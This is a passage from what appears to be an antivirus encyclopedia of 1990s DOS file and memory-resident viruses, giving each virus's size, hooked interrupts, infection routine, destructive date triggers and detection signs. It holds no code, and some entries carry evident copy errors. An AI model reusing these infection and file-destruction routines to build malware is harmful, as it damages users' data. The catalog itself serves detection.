4) If no uninfected file is found in the current directory, it will
continue to look for an uninfected file in another directory.
5) It will then check the system date. If it is December, then this
message will appear on the screen: "Yole from the ARcV........."
Damage: None
Detection Method:
1) Infected files will increase by 742 Bytes.
2) If it is December the following message will appear on the screen:
"Yole from the ARcV.......".
Note:
1) Doesn't stay resident in memory.
2) ANNA doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as writing protect).
[Grunt2]
Virus Name: Grunt2
Virus Type: File Virus (infects .COM files)
Virus Length: 427 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
GRUNT2. If "Yes", it continues to look for any uninfected .COM
file.
3) It will infect only one file at a time.
4) It then checks the system date. If the date is the 3rd of September
and year is larger than 1993, it will delete a file on the current
disk and then show the screen message: "S[GRUNT-2] -=> Agent Orange
'92 <=- Rock of the Marne Sir!.......".
Damage: If system date is 3rd of September and year is larger than
1993, the virus will delete a file on the current disk.
Detection Method: Infected files will increase by 427 Bytes.
Note:
1) Doesn't stay resident in memory.
2) GRUNT2 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as a write protect).
[VDV-853]
Virus Name: Vdv-853
Virus Type: File Virus (infects .COM files)
Virus Length: 853 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is between the 24th and 26th of
December. If "yes", the virus will delete all files in the
current directory, then will create a file with 273 bytes and
show the message: "Frhliche Weihnachten wnscht der Verband
Deutscher Virenliebhaber Ach ja, und dann wnschen wir auch noch
viel Spab beim Suchen nach den Daten von der Festplatte! Hello -
Copyright S&S International, 1990".
2) If "no", then it will search for a .COM file in the current
directory. b) Once it locates a file it checks whether it has
been infected by VDV-853. If "Yes", it continues to look for an
uninfected .COM file. c) It will only infect four files at a
time.
Damage: If the system date is between the 24th and 26th of December,
the virus will delete all files in the current directory.
Detection Method: Infected files will increase by 853 Bytes.
Note:
1) Doesn't stay resident in memory.
2) VDV-853 don't hook INT 24h when infecting files. Error message
appears if there is an error of I/O (such as a write protect).
3) Virus pattern is the same as "SON_OF_VSC_2".
[Wild Thing]
Virus Name: Wild-Thing
Virus Type: File Virus (infects .COM files)
Virus Length: 567 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is Friday. If "yes", a message
appears on the screen: " It's Friday ........ Enjoy the weekend
with your computer![YAM '92]." Then the system halts.
2) If "no", then it will search for a .COM file in the current
directory. Once it locates a file it checks whether it has been
infected by Wild-Thing. If "Yes", it continues to look for
another uninfected .COM file.
3) It will infect all files in the current and the "mother" directories
until all .COM files become infected.
4) Then it will execute the original file.
Damage: If the system date is Friday, this message appears: "It's
Friday ....... Enjoy the weekend with your computer![YAM '92]."
Then the system halts.
Detection Method: Infected files will increase by 567 bytes.
Note:
1) Doesn't stay resident in memory.
2) Wild-Thing doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as a write
protect).
[Arcv-Fri]
Virus Name: Arcv-Fri
Virus Type: File Virus (infects .COM files)
Virus Length: 839 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is April 12; if "Yes", it searches
for a .COM file in the current directory, then damages it.
2) If "No", then it searches for a .COM file in the current directory.
3) It checks whether it has been infected by ARCV-FRI. If "Yes", it
continues to look for any uninfected .COM file.
4) It only infects one file at a time.
5) It then executes the original file.
Damage: If the system date is April 12, it searches for a .COM file
in the current directory, then damages it.
Detection Method: Infected files will increase by 839 Bytes.
Note:
1) Doesn't stay resident in memory.
2) ARCV-FRI doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Agent-B]
Virus Name: Agent-B
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: 763 Bytes(COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Argent. If "Yes", it continues to look for any uninfected .COM
file.
3) It will infect only two files at a time.
Damage: None
Detection Method: Infected files will increase by 763 bytes.
Note:
1) Doesn't stay resident in memory.
2) Argent hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Nanite]
Virus Name: Nanite
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM or .EXE file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Nanite. If "Yes", it continues to look for any uninfected .COM
or .EXE file.
3) It will infect all .EXE and .COM files until all files in the
current directory have been infected
Damage: Overwrites the original files, so the length of infected
files won't increase.
Note:
1) Doesn't stay resident in memory.
2) Nanite doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Arcv-670]
Virus Name: Arcv-670
Virus Type: File Virus (infects .COM files)
Virus Length: 670 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected
by ARCV-670. If "Yes", it continues to look for any uninfected
.COM file.
3) It will infect only one file at a time.
4) It finally checks the system date. If the date is between the
20th and 25th of December, and the year is larger than 1992,
it will show the message: "Happy Xmas from the ARCV", then the
system halts.
Damage: If the system date is between the 20th and 25th of December
and the year is larger than 1992, this message appears: "Happy Xmas
from the ARCV", then the system halts.
Detection Method: Infected files will increase by 670 Bytes.
Note:
1) Doesn't stay resident in memory.
2) ARCV-670 doesn't hook INT 24h when infecting files. Error
message appears if there is an I/O error (such as write
protect).
[Why]
Virus Name: Why
Virus Type: File Virus (infects .COM files)
Virus Length: 457 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected
by Why. If "Yes", it continues to look for any uninfected .COM
file.
3) It will only infect one file at a time.
4) It then checks the system date. If the date is the 12th of May
or the 25th of February, the virus will damage all files on
the hard disk.
Damage: If the system date is May 12 or February 25, the virus
will damage all files on the hard disk.
Detection Method: Infected files will increase by 457 Bytes.
Note:
1) Doesn't stay resident in memory.
2) "Why" doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[FCB]
Virus Name: Fcb
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected
by FCB. If "Yes", it continues to look for any uninfected
.COM file.
3) It will only infect one file at a time.
4) Searches for an .EXE file in the current directory.
5) Once it locates a file it checks whether it has been infected
by FCB. If "Yes", it continues to look for any uninfected .EXE
file.
6) It will only infect one file at a time.
Damage: Overwrites the original file, so the length of the infected
file won't increase.
Note:
1) Doesn't stay resident in memory.
2) FCB doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Casper]
Virus Name: Casper
Virus Type: File Virus (infects .COM files)
Virus Length: 1200 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is the first of April. If "yes",
then it formats the current disk,
2) If "no", then it searches for a *.C* file in the current
directory.
2) Once it locates a file it checks whether it has been infected by
FCB. If "Yes", it continues to look for any uninfected *.C*
file.
3) It will only infect one file at a time.
4) It then executes the original file.
Damage: If the system date is the 1st of April, it formats the
current disk.
Detection Method: Infected files will increase by 1200 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Casper doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Diogenes]
Virus Name: Diogenes
Virus Type: File Virus (infects .COM files)
Virus Length: 946 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is the 31st. If "Yes", it damages
all files on the hard disk, then displays this message on the
screen: "DIOGENES 2.0 has visited your hard drive...... This
has been another fine product of the Lehigh Valley...Watch (out)
for future 'upgrades'.. ... The world's deceit has raped my soul.
We melt the plastic people down, then we melt their plastic town."
2) If "NO', then it searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
Diogenes. If "Yes", it continues to look for any uninfected
.COM file.
3) It will only infect one file at a time.
Damage: If the system date is the 31st, it damages all files on the
hard disk.
Detection Method: Infected files will increase by 946 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Diogenes doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Brothers-2]
Virus Name: Brothers-2
Virus Type: File Virus (infects .COM files)
Virus Length: 693 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is between the 11th and 25th of
November or December. If "Yes", it shows the message:
"Brotherhood... I am seeking my brothers "DEICIDE" and
"MORGOTH"," then executes the original file.
2) If "NO', then it searches for a .COM file in the current
directory.
2) Once it locates a file it checks whether it has been infected by
Brothers-2. If "Yes", it continues to look for any uninfected
.COM file.
3) It will check whether the second word of the .COM file is "0xADDE";
if "yes", it will show the message: "Found my brother MORGOTH!!!."
Then executes the original file.
4) It will also check whether the second word of the .COM file is
"0x0D90"; if "yes", it will show the message: "Found my brother
"DEIGOTH" !!!." Then executes the original file.
5) If "NO", then it will infect .COM files one at a time.
6)It will execute the original file.
Damage: None
Detection Method: Infected files will increase by 693 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Brothers-2 doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Mindless]
Virus Name: Mindless
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system date is Sunday. If "yes", it damages
all files on the hard disk.
2) If "NO', then it searches for a *.C* file in the current directory.
2) Once it locates a file it infects it and continues searching until
it infects all the *.C* files in the current directory.
Damage:
1) If the system date is Sunday, it damages all files on the hard disk.
2) Overwrites original files, so the length of infected files won't
increase.
Detection Method: None
Note:
1) Doesn't stay resident in memory.
2) Mindless doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Acme]
Virus Name: Acme
Virus Type: File Virus (Companion Virus)
Virus Length: 932 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the system time is after 4 o'clock in the afternoon.
If "Yes", a sound is made, then the system halts.
2) If "NO', then it searches for an .EXE file in the current directory.
3) It will then create a 923 bytes, "hidden & read-only" .COM file
with the .EXE file name.
Damage: If the system time is after 4 o'clock in the afternoon, a sound
is made, then the system halts.
Detection Method: Check whether there are "hidden" .COM files with 923
bytes of data.
Note:
1) Doesn't stay resident in memory.
2) ACME doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
[Dest1]
Virus Name: DEST1
Virus Type: File Virus (only infects .COM files)
Virus Length: 323 Bytes
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) It checks whether it has been infected by Dest1. If "Yes", it
continues to look for an uninfected .COM file.
3) It then infects any uninfected .COM file, one file at a time.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 323 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Dest1 hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Dest2]
Virus Name: DEST2
Virus Type: File Virus (infects .COM files only)
Virus Length: 478 Bytes
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for a COM file in the current directory.
2) It checks whether it has been infected by Dest2. If "Yes", it
continues to look for an uninfected .COM file.
3) It then infects the .COM file. It finally executes the original
file.
Damage: If kill-flag=-1, it then deletes a file.
Detection method: Infected files will increase by 478 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Dest2 hook INT 24h when infecting files. Omits I/O error
(such as write protect).
[Cyber101]
Virus Name: CYBER101
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 946 Bytes(COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for a .COM or .EXE file in the current directory.
2) It checks whether it has been infected by Cyber101. If "Yes",
it continues to look for an uninfected .COM or .EXE file.
3) It then infects any .COM or .EXE files in the current directory
two at a time.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 946 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Cyber101 hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Cyber]
Virus Name: CYBER
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 1092 Bytes(COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for a .COM or .EXE file in the current directory.
2) It checks whether it has been infected by Cyber. If "Yes", it
continues to look for an uninfected .COM or .EXE file.
3) It then infects any .COM or .EXE file in the current directory two
at a time.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 1092 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Cyber hooks INT 24h when infecting files. Omits I/O error (such
as write protect).
[7thson-2]
Virus Name: 7THSON-2
Virus Type: File Virus (infects .COM files)
Virus Length: 284 or 332 or 350 Bytes(COM)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for a .COM file in the current directory.
2) It checks whether it has been infected by 7thson-2. If "Yes",
it continues to look for an uninfected files.
3) It then infects all .COM files in the current directory.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 284, 332, or 350
Bytes.
Note:
1) Doesn't stay resident in memory.
2) 7thson-2 hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Bamestra]
Virus Name: BAMESTRA
Virus Type: File Virus (infects .EXE files)
Virus Length: 530 Bytes(EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE file in the current directory.
2) It checks whether it has been infected by Bamestra. If "Yes",
it continues to look for an uninfected .EXE file.
3) It then infects any .EXE file in the current directory two at a
time.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 530 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Bamestra hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Abraxas]
Virus Name: ABRAXAS
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 546 Bytes(COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by Abraxas. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects all .EXE and .COM files in the current directory.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 546 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Abraxas hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[MPC-1]
Virus Name: MPC-1
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 641 Bytes (COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by MPC-1. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects all .EXE and .COM files in the current directory.
4) Finally it executes the original file.
Damage: None
Detection method: Infected files will increase by 641 Bytes.
Note:
1) Doesn't stay resident in memory.
2) MPC-1 hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Zeppelin]
Virus Name: ZEPPELIN
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 1508 Bytes (COM and EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by Abraxas. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects any .EXE and .COM files in the current directory
four at a time.
4) Finally it displays various codes, and sounds are made at the
same time, then the system halts.
Damage: Shows codes, and makes strange sounds at the same time, then
the system halts.
Detection method:
1) Infected files will increase by 1508 Bytes.
2) Codes appear on the screen.
Note:
1) Doesn't stay resident in memory.
2) Zeppelin hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Crumble]
Virus Name: CRUMBLE
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 778 Bytes (COM & EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by Crumble. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects any .EXE or .COM files in the current directory
two files at a time.
4) Finally it checks the system date; if it is Friday, the message
"falling letter" appears on the screen, then a letter falls
every 5 seconds on the screen.
Damage: If it is Friday, system will display "falling letter."
Detection method: Infected files will increase by 778 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Crumble hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[COL-MAC]
Virus Name: COL_MAC
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 1022 Bytes (COM and EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by COL_MAC. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects any two .EXE and .COM files in the current
directory.
4) Finally it shows a lot of random letters on the screen until the
ENTER key is pressed.
Damage: None
Detection method: Infected files will increase by 1022 Bytes.
Note:
1) Doesn't stay resident in memory.
2) COL_MAC hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Galileo]
Virus Name: GALILEO
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 760 Bytes (COM and EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Checks whether system date is Monday; if "Yes", the virus will
damage all files on the hard disk.
2) It searches for a .COM or .EXE file in current directory.
3) It then infects all .COM and .EXE files in the current directory.
Damage: If it is Monday, the virus will damage all files on the
hard disk.
Detection method: Infected files will increase by 760 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Galileo hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Wharps]
Virus Name: WHARPS
Virus Type: File Virus (infects .COM files)
Virus Length: 572 Bytes (COM)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus checks whether the system time is 3 o'clock in the
morning; if "Yes", the message appears on the screen:
"wHaRpS! It is 3:00 a.m. > ETERNAL."
2) It searches for a .COM file in the current directory.
3) It then checks whether it has been infected by Wharps. If
"Yes", it continues to look for an uninfected .COM file,
infecting each file one at a time.
5) Finally it executes the original file.
Damage: Infected files can't be executed.
Detection method: Infected files will increase by 572 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Wharps hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Bubbles-2]
Virus Name: BUBBLES-2
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 927 Bytes (COM and EXE)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current
directory.
2) It checks whether it has been infected by Bubbles-2. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
3) It then infects all .EXE and .COM files in the current directory.
4) It finally checks whether the system date is the 13th and year is
not smaller than 1993, then it displays this message on the
screen: "Bubbles 2 : "Its back and better then ever. Is
it me or does that make no sense at all?"
Damage: Infected files can't be executed.
Detection method: Infected files will increase by 927 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Bubbles-2 hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Cybertech]
Virus Name: CYBERTECH
Virus Type: File Virus (infects .COM files)
Virus Length: 1076 Bytes (COM)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) It checks whether the system date is smaller than 1993. If "Yes",
then the virus searches for a .COM file in the current directory.
2) It checks whether it has been infected by Cybertech. If "Yes",
it continues to look for an uninfected .COM file.
3) It then infects any .COM file in the current directory one at a
time.
4) If "no", then this message appears on the screen: "The previous
year you have been infected by a virus without knowing or removing
it. To be gentle to you I decided to remove myself from your
system. I suggest you better buy VirusScan of McAfee to ensure
yourself complete security of your precious data. Next time you
could be infected with a malevolent virus. May I say goodbye to you
for now. CyberTech Virus-Strain A (c) 1992 John Tardy of Trident".
It finally restores the current file as before.
Damage: None
Detection method: Infected files will increase by 1076 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Cybertech hooks INT 24h when infecting files. Omits I/O error
(such as write protect).
[Crazy]
Virus Name: CRAZY
Virus Type: Boot Strap Sector Virus
Virus Length: 4006 Bytes
PC Vectors Hooked: None
Execution Procedure: This virus infects no file, partition or boot
sector. When it is executed, it will create 50 subdirectories,
50 subdirectories are created in each subdirectory.
Damage: None
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Crazy doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[Burger_560-8]
Virus Name: BURGER_560-8
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in A:.
2) It checks whether it has been infected by Burger_560-8. If "Yes",
it continues to look for an uninfected .COM file.
3) It then infects an uninfected file one at a time.
4) If no .COM file is infected, it will continue to look for an .EXE
file in A:.
5) It finally renames the .EXE file to .COM, then it infects the
.COM file.
Damage: Overwrites the original file, so the length of the infected
file won't increase.
Detection method: Changes .EXE file to a .COM file.
Note:
1) Doesn't stay resident in memory.
2) Burger_560-8 don't hooks INT 24h when infecting files. Error
message appears if there is an I/O error (such as write protect).
[Boys]
Virus Name: BOYS
Virus Type: File Virus (infects .COM files)
Virus Length: 500 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) It searches for an .EXE file, it then changes the attribute to
"SYSTEM".
2) It searches for a .COM file in the current directory.
3) It then checks whether it has been infected by Boys. If "Yes",
it continues to look for an uninfected .COM file.
4) It only infects one file at a time, and changes the attribute to
"READ-ONLY".
5) Finally it executes the original file.
Damage: None.
Detection method: Infected files will increase by 500 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Boys doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[Null]
Virus Name: NULL
Virus Type: File Virus (infects .COM files)
Virus Length: 733 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) It first decodes.
2) Then it searches for a .COM file in the current directory.
3) It checks whether it has been infected by Null. If "Yes", it
continues to look for an uninfected .COM file.
4) It infects only one file at a time.
5) It then executes the original file.
6) If it can not infect a .COM file, then it checks whether the
DAY =30. If "yes", it destroys all the data on the disk, then
shows the message: "Your disk is dead! Long life Doomsday 1.0."
Damage: If DAY = 30 , then it destroys all data on the current disk.
Detection method: Infected files will increase by 733 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Null doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[Vienna-11]
Virus Name: VIENNA-11
Virus Type: File Virus (infects .COM files)
Virus Length: 943 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) Checks whether the clock's Seconds field is equal to .0004. If
"Yes", then this message will appear on the screen: "Sorry
this computer is no longer operational due to an outbreak of
Bush is hero, Have a Nice day. . . "
2) Next it will check as to whether the time is equal to 7:45 and
24th of March. If "Yes", then a message will appear on the
screen: "VIPERizer, Strain B (c) 1992, Stin gray/VIPER
Happy Valentines Day !" It then destroys all data on all of the
disks including the hard disk.
3) If "No", then it searches for a .COM file in the current directory.
4) Checks whether it has been infected by Vienna-11. If "Yes", it
continues to look for an uninfected .COM file.
5) It only infects one file at a time, afterwards it executes the
original file.
Damage: Destroys all data on all of the disks.
Detection method: Infected files will increase by 943 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Vienna-11 doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Intrud-B]
Virus Name: INTRUD-B
Virus Type: File Virus (infects .EXE files)
Virus Length: 1225 Bytes (EXE)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE file in the current directory.
2) It checks whether it has been infected by Intrud-B. If "Yes",
it continues to look for an uninfected .EXE file.
3) It then infects only one file at a time.
4) It then executes the original file.
Damage: None
Detection method: Infected files will increase by 1225 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Intrud-B doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write
protect).
[New-s]
Virus Name: NEW-S
Virus Type: File Virus (infects .EXE files)
Virus Length: 1214 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) First shows a strange figure on the screen (with music).
2) Then searches for an EXE file in the current directory. It then
creates a file of the same name with the length of 1214 bytes
and overwrites the original file. The new file is New-S.
3) Finally it overwrites the COMMAND.COM in the root directory and
copies the overwritten file to the root directory.
Damage: Overwrites original file.
Detection method: Infected files will increase by 1214 Bytes.
Note:
1) Doesn't stay resident in memory.
2) NEW-S doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[X-1-B]
Virus Name: X-1-B
Virus Type: File Virus (infects .EXE files)
Virus Length: 555 Bytes (EXE)
PC Vectors Hooked: None
Execution Procedure:
1) The virus checks whether the system date is the 5th of March.
If "Yes", it displays the message: "ICE-9 Present In Association
with.. The ARcV [X-1] Michelangelo activates. . -<TOMORROW>-,"
then the system halts.
2) If "No", then it searches for an .EXE file in the current directory.
3) It checks whether it has been infected already by X-1. If "Yes", it
continues to look for an uninfected .EXE file.
4) It then infects only one file at a time.
5) Then it executes the original file.
Damage: If it is the 5th of March, it displays a message, and then the
system halts.
Detection method: Infected files will increase by 555 Bytes.
Note:
1) Doesn't stay resident in memory.
2) X-1 doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[Lep-FVHS]
Virus Name: LEP-FVHS
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: NO change
PC Vectors Hooked: None
Execution Procedure:
1) Shows the message: "allocating memory..... Please wait.....
Hard time accessing memory, please turn off all RAM resident
programs and press>>Enter<< to continue...."
2) The virus searches for an .EXE or .COM file in the current
directory.
3) It checks whether it has been infected by LEP-FVHS. If "Yes",
it continues to look for an uninfected .EXE or .COM file.
4) If "No", it then infects any four .EXE and .COM files at a time
in the current directory.
5) Shows the message: "Program too big to fit in memory."
Damage: Overwrites original files, so the length of infected files
won't increase.
Detection method: Shows the message: "Allocating memory...."
Note:
1) Doesn't stay resident in memory.
2) LEP-FVHS doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Monxla]
Virus Name: MONXLA
Virus Type: File Virus (infects .COM files)
Virus Length: 939 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) The virus searches for a .COM file in the current directory.
2) It checks whether the system date is the 13th; if "Yes", then it
destroys the file.
3) If "No", it checks whether it has been infected by MONXLA.
If "Yes", it continues to look for an uninfected .COM file.
3) It then infects any one .COM file in the current directory.
4) Finally it executes the original file.
Damage: If the system date is the 13th, then it destroys a .COM file.
Detection method: Infected files will increase by 939 Bytes.
Note:
1) Doesn't stay resident in memory.
2) MONXLA doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[More-649]
Virus Name: MORE-649
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 649 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h), execute program
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any
uninfected file that is executed. (b) It doesn't infect .EXE
files or files with special dates (year larger than 1999).
4) When the virus detects a file that has a date larger than 1999,
this message appears: "OH NO NOT MORE ARCV".
Damage: None
Detection method: Infected .COM files increase by 649 Bytes.
[Arka]
Virus Name: ARKA
Virus Type: Memory Resident, File Virus (infects .COM files).
Virus Length: 1905 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h), execute program
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any executed
file that is not already infected with the ARKA virus.
Damage: None
Detection method: Infected COM files increase by 1905 Bytes.
[578]
Virus Name: 578
Virus Type: Memory Resident, File Virus (infects .COM files)
Virus Length: 578 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h), execute program
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any uninfected
file that is executed. (b) It doesn't infect .EXE files.
4) The virus will then check the system date; if it is later than
April 3, then the virus will destroy all data on A: followed by
the displaying of three colored flags and the message: "ITALY
IS THE BEST COUNTRY IN THE WORLD."
Damage: If the system date is later than April 3, the virus will
destroy all data on A:.
Detection method: Infected COM files increase by 578 Bytes.
Note:
1) 578 doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[5LO]
Virus Name: 5LO
Virus Type: Memory Resident, File Virus (infects .EXE files).
Virus Length: 1125-1140 Bytes (EXE)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. (b) It doesn't infect .COM files.
Damage: None
Detection method: Infected .EXE files increase by 1125-1140 Bytes.
Note: The 5LO virus doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[Aids 552]
Virus Name: AIDS552
Virus Type: Highest Memory Resident, File Virus (infects .EXE files)
Virus Length: 552 Bytes (EXE)
PC Vectors Hooked: INT 21h
Infection Procedure:
1) The virus checks whether it is already loaded resident into memory.
If "No", it then loads itself into memory (highest memory) by
hooking INT 21h.
2) It then executes the original file.
3) It infects when the command "DEGUG FILE_NAME.EXE" is executed.
b) Doesn't infect .COM files.
Damage: None
Detection method: Infected .EXE files increase by 552 Bytes.
Note:
The AIDS552 virus doesn't hook INT 24h when infecting files. An
error message appears if there is an I/O error (such as write
protect).
[408]
Virus Name: 408
Virus Type: Memory Resident, File Virus (infects .COM files).
Virus Length: 408 Bytes (COM)
PC Vectors Hooked: INT 21h (AX=4B00h) (execute program)
Infection Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Detection method: Infected files increase by 408 Bytes.
Note:
